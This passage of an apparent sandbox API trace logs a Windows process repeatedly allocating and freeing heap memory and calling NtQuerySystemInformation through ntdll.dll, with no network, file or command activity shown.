0x2026c630000 [0274.420] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c040 | out: hHeap=0x2026c630000) returned 1 [0274.420] GetProcessHeap () returned 0x2026c630000 [0274.420] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1e4) returned 0x2026d2edcd0 [0274.421] GetProcessHeap () returned 0x2026c630000 [0274.421] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x104) returned 0x2026c692000 [0274.421] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdd88 | out: phModule=0xc751dfdd88*=0x7ffcea380000) returned 1 [0274.421] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.421] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdeb0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdeb0, ResultLength=0x0) returned 0x0 [0274.421] GetProcessHeap () returned 0x2026c630000 [0274.421] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8849b0 [0274.421] GetProcessHeap () returned 0x2026c630000 [0274.421] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x50) returned 0x2026d858f40 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8081c0 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7840 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x40) returned 0x2026d78e5f0 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63aaa0 | out: hHeap=0x2026c630000) returned 1 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71ca40 | out: hHeap=0x2026c630000) returned 1 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d808110 | out: hHeap=0x2026c630000) returned 1 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7950 | out: hHeap=0x2026c630000) returned 1 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884670 | out: hHeap=0x2026c630000) returned 1 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0274.422] GetProcessHeap () returned 0x2026c630000 [0274.422] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692000 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d858f40 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8081c0 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7840 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8849b0 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e550 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.423] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63b550 | out: hHeap=0x2026c630000) returned 1 [0274.423] GetProcessHeap () returned 0x2026c630000 [0274.424] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e5f0 | out: hHeap=0x2026c630000) returned 1 [0274.424] GetProcessHeap () returned 0x2026c630000 [0274.424] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807fb0 | out: hHeap=0x2026c630000) returned 1 [0274.424] GetProcessHeap () returned 0x2026c630000 [0274.424] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7810 | out: hHeap=0x2026c630000) returned 1 [0274.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.424] GetProcessHeap () returned 0x2026c630000 [0274.424] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807350 [0274.424] GetProcessHeap () returned 0x2026c630000 [0274.424] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7710 [0274.424] GetProcessHeap () returned 0x2026c630000 [0274.424] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x122) returned 0x2026c63aaa0 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x130) returned 0x2026c71c400 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884d70 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x138) returned 0x2026c71bdc0 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8071f0 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7a30 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c680 | out: hHeap=0x2026c630000) returned 1 [0274.426] GetProcessHeap () returned 0x2026c630000 [0274.426] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1ec) returned 0x2026d2edcd0 [0274.427] GetProcessHeap () returned 0x2026c630000 [0274.427] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x2f4) returned 0x2026c724ab0 [0274.427] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdd88 | out: phModule=0xc751dfdd88*=0x7ffcea380000) returned 1 [0274.427] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.427] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdeb0, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdeb0, ResultLength=0x0) returned 0x0 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884230 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x78) returned 0x2026d7c2da0 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806bc0 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d76d0 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x68) returned 0x2026d7a09f0 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71c400 | out: hHeap=0x2026c630000) returned 1 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c71bdc0 | out: hHeap=0x2026c630000) returned 1 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8071f0 | out: hHeap=0x2026c630000) returned 1 [0274.428] GetProcessHeap () returned 0x2026c630000 [0274.428] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7a30 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884d70 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d2edcd0 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c724ab0 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7c2da0 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806bc0 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d76d0 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884230 | out: hHeap=0x2026c630000) returned 1 [0274.429] GetProcessHeap () returned 0x2026c630000 [0274.429] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7c37a0 | out: hHeap=0x2026c630000) returned 1 [0274.430] GetProcessHeap () returned 0x2026c630000 [0274.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63aaa0 | out: hHeap=0x2026c630000) returned 1 [0274.430] GetProcessHeap () returned 0x2026c630000 [0274.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7a09f0 | out: hHeap=0x2026c630000) returned 1 [0274.430] GetProcessHeap () returned 0x2026c630000 [0274.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807350 | out: hHeap=0x2026c630000) returned 1 [0274.430] GetProcessHeap () returned 0x2026c630000 [0274.430] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7710 | out: hHeap=0x2026c630000) returned 1 [0274.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x28, ResultLength=0x0) [0274.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.435] GetProcessHeap () returned 0x2026c630000 [0274.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806430 [0274.435] GetProcessHeap () returned 0x2026c630000 [0274.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7790 [0274.435] GetProcessHeap () returned 0x2026c630000 [0274.435] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfe) returned 0x2026c691cd0 [0274.436] GetProcessHeap () returned 0x2026c630000 [0274.436] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x108) returned 0x2026c692bb0 [0274.436] GetProcessHeap () returned 0x2026c630000 [0274.436] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884470 [0274.436] GetProcessHeap () returned 0x2026c630000 [0274.436] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x110) returned 0x2026d732fc0 [0274.436] GetProcessHeap () returned 0x2026c630000 [0274.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d807350 [0274.437] GetProcessHeap () returned 0x2026c630000 [0274.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7a10 [0274.437] GetProcessHeap () returned 0x2026c630000 [0274.437] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732a20 | out: hHeap=0x2026c630000) returned 1 [0274.437] GetProcessHeap () returned 0x2026c630000 [0274.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x1c4) returned 0x2026d242440 [0274.437] GetProcessHeap () returned 0x2026c630000 [0274.437] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xfc) returned 0x2026c692cc0 [0274.437] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfde08 | out: phModule=0xc751dfde08*=0x7ffcea380000) returned 1 [0274.438] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.438] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdf30, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdf30, ResultLength=0x0) returned 0x0 [0274.438] GetProcessHeap () returned 0x2026c630000 [0274.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884c70 [0274.438] GetProcessHeap () returned 0x2026c630000 [0274.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x48) returned 0x2026d78e550 [0274.438] GetProcessHeap () returned 0x2026c630000 [0274.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d806590 [0274.438] GetProcessHeap () returned 0x2026c630000 [0274.438] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7830 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x34) returned 0x2026d884ef0 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692bb0 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d732fc0 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d807350 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7a10 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884470 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d242440 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c692cc0 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e550 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806590 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7830 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884c70 | out: hHeap=0x2026c630000) returned 1 [0274.439] GetProcessHeap () returned 0x2026c630000 [0274.439] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d78e5f0 | out: hHeap=0x2026c630000) returned 1 [0274.440] GetProcessHeap () returned 0x2026c630000 [0274.440] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c691cd0 | out: hHeap=0x2026c630000) returned 1 [0274.440] GetProcessHeap () returned 0x2026c630000 [0274.440] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884ef0 | out: hHeap=0x2026c630000) returned 1 [0274.440] GetProcessHeap () returned 0x2026c630000 [0274.440] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d806430 | out: hHeap=0x2026c630000) returned 1 [0274.440] GetProcessHeap () returned 0x2026c630000 [0274.440] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7790 | out: hHeap=0x2026c630000) returned 1 [0274.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d808320 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7970 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xb8) returned 0x2026d29c6c0 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc0) returned 0x2026d316000 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d8850b0 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc8) returned 0x2026d315b20 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805f60 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.442] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7980 [0274.442] GetProcessHeap () returned 0x2026c630000 [0274.443] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d315710 | out: hHeap=0x2026c630000) returned 1 [0274.443] GetProcessHeap () returned 0x2026c630000 [0274.443] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x17c) returned 0x2026d292680 [0274.443] GetProcessHeap () returned 0x2026c630000 [0274.443] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xdc) returned 0x2026c63dca0 [0274.443] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdf30 | out: phModule=0xc751dfdf30*=0x7ffcea380000) returned 1 [0274.443] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.444] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfdfe8, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfdfe8, ResultLength=0x0) returned 0x0 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884730 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x28) returned 0x2026d661490 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805d50 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7710 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x14) returned 0x2026d7198c0 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d316000 | out: hHeap=0x2026c630000) returned 1 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d315b20 | out: hHeap=0x2026c630000) returned 1 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.444] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805f60 | out: hHeap=0x2026c630000) returned 1 [0274.444] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7980 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8850b0 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d292680 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026c63dca0 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d661490 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805d50 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7710 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884730 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6611f0 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d29c6c0 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d7198c0 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d808320 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7970 | out: hHeap=0x2026c630000) returned 1 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d8060c0 [0274.445] GetProcessHeap () returned 0x2026c630000 [0274.445] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d79f0 [0274.446] GetProcessHeap () returned 0x2026c630000 [0274.446] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc658) returned 0x2026d6c2ec0 [0274.447] GetProcessHeap () returned 0x2026c630000 [0274.447] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc660) returned 0x2026d892030 [0274.448] GetProcessHeap () returned 0x2026c630000 [0274.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884ef0 [0274.448] GetProcessHeap () returned 0x2026c630000 [0274.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc668) returned 0x2026d6db1f0 [0274.448] GetProcessHeap () returned 0x2026c630000 [0274.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805d50 [0274.448] GetProcessHeap () returned 0x2026c630000 [0274.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d77e0 [0274.448] GetProcessHeap () returned 0x2026c630000 [0274.448] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d89e6a0 | out: hHeap=0x2026c630000) returned 1 [0274.448] GetProcessHeap () returned 0x2026c630000 [0274.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xc71c) returned 0x2026d89e6a0 [0274.449] GetProcessHeap () returned 0x2026c630000 [0274.449] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xcc) returned 0x2026d423a30 [0274.449] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xc751dfdfb0 | out: phModule=0xc751dfdfb0*=0x7ffcea380000) returned 1 [0274.449] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0274.449] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xc751dfe008, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xc751dfe008, ResultLength=0x0) returned 0x0 [0274.454] GetProcessHeap () returned 0x2026c630000 [0274.454] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x30) returned 0x2026d884db0 [0274.454] GetProcessHeap () returned 0x2026c630000 [0274.454] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x18) returned 0x2026d719b00 [0274.454] GetProcessHeap () returned 0x2026c630000 [0274.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0xa0) returned 0x2026d805e00 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7780 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x8, Size=0x8) returned 0x2026d6d7a30 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d892030 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6db1f0 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805d50 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d77e0 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884ef0 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d89e6a0 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d423a30 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d719b00 | out: hHeap=0x2026c630000) returned 1 [0274.455] 